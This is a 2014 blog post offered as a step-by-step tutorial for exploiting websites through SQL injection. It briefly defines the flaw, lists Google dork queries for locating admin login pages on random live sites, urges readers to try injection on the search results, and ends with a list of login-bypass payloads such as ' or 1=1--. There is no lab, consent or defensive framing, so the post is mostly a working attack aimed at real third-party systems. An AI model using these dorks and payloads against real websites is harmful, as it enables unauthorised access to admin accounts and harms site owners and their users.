Posted by : Unknown
March 16, 2014
Exploiting Web Applications by SQL Injection (Step By Step Tutorial)
Hello readers, today I am sharing with you how to exploit a web application with a SQL injection attack. In this post I show you, step by step, how to bypass an admin login using some queries.
What is SQL Injection?
SQL Injection is a code injection technique that
exploits a security vulnerability occurring in the database layer of an
application. The vulnerability is present when user input is either incorrectly
filtered for string literal escape characters embedded in SQL statements or
user input is not strongly typed and thereby unexpectedly executed. It is an
instance of a more general class of vulnerabilities that can occur whenever one
programming or scripting language is embedded inside another. SQL injection
attacks are also known as SQL insertion attacks.
[Step - 1] Find SQL Injection Vulnerable Website
First we need a vulnerable site to attack. This is the first step in SQL injection exploitation and, like in every other hacking attack, it is the most time-consuming step, and the only time-consuming one.
1) By Google Dork
Google dorks are at the center of Google hacking. Google's database is the biggest, so hackers exploit it by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For example, use these Google dorks to find random websites vulnerable to SQL injection.
There are a large number of Google dorks for basic SQL injection. Here are the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
After this you will see many websites in the Google search results. Try the SQL injection on these.
[Step - 2] SQL Injection Queries
Here is a list of some popular SQL injection queries. We can use these to bypass login authentication. These queries confuse the database into treating the input as part of the SQL statement.
'or''='
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
hi" or "a"="a
hi" or 1=1 --